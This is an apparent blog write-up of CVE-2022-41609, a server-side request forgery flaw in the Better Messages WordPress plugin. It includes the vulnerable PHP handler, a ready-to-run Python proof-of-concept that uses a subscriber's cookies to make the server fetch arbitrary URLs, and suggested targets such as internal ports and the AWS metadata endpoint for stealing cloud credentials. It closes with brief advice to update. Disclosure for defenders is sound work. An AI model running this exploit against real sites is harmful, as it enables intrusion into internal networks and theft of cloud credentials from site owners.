CVE-2022-41609 - Exploiting SSRF in Better Messages WordPress Plugin (Subscriber+ Auth Required)

WordPress powers millions of websites, and plugins extend its features. But what happens if a plugin has a dangerous security flaw? In this post, we’ll break down CVE-2022-41609, a Server-Side Request Forgery (SSRF) flaw in the Better Messages plugin (version 1.9.10.68), how it can be exploited by low-level users (subscribers and above), show a proof-of-concept exploit, and explain how you can stay safe.

What Is Better Messages?

Better Messages is a popular messaging/chat system for WordPress. It allows logged-in users to talk to each other within your WordPress site.

What is CVE-2022-41609?

This vulnerability allows a logged-in user (even just a Subscriber) to force the server to make web requests to any URL. This is called SSRF (Server-Side Request Forgery).

Where’s The Bug?

The vulnerability lives in the REST API endpoints handled by the plugin. One of the endpoints lets any subscriber send a request, providing a user-controlled URL. The plugin didn’t properly check if the URL was safe.

Here’s a simplified version of the vulnerable code (ajax.php, old version)

if($_POST['action'] === 'bm_file_proxy') {
    $url = $_POST['url'];
    $response = wp_remote_get($url);
    echo wp_remote_retrieve_body($response);
}

No checks on the URL! If you can send arbitrary URLs, you can force the server to make requests anywhere.

Exploiting CVE-2022-41609: Step-by-Step

Requirements:

Send a POST request to the vulnerable AJAX handler with the target URL.

Example: SSRF to fetch http://localhost:808/private-data

Here's a Python PoC using requests

import requests

url = 'https://target-wordpress-site.com/wp-admin/admin-ajax.php';
cookies = {'wordpress_logged_in_xxx': '...'}  # fill with your auth cookies

post_data = {
    'action': 'bm_file_proxy',
    'url': 'http://localhost:808/private-data'
}

r = requests.post(url, data=post_data, cookies=cookies)
print(r.text)

What does this do?
If port 808 is running something internal, this request fetches its content and displays it to the attacker.

Try URLs like

- http://127...1:3306/
- http://169.254.169.254/latest/meta-data/ (for AWS metadata stealing)

References

- NVD Summary of CVE-2022-41609
- Plugin Page: Better Messages
- SSRF Explained

Conclusion

CVE-2022-41609 proves that a simple lack of URL validation can have big consequences, especially in a plugin with thousands of users. SSRF is always serious because it lets attackers make your WordPress site poke at anything on your network or the internet.

If you run Better Messages, you need to update now and regularly review your plugins and their security history.

Timeline

Published on: 11/19/2022 00:15:00 UTC
Last modified on: 11/21/2022 01:29:00 UTC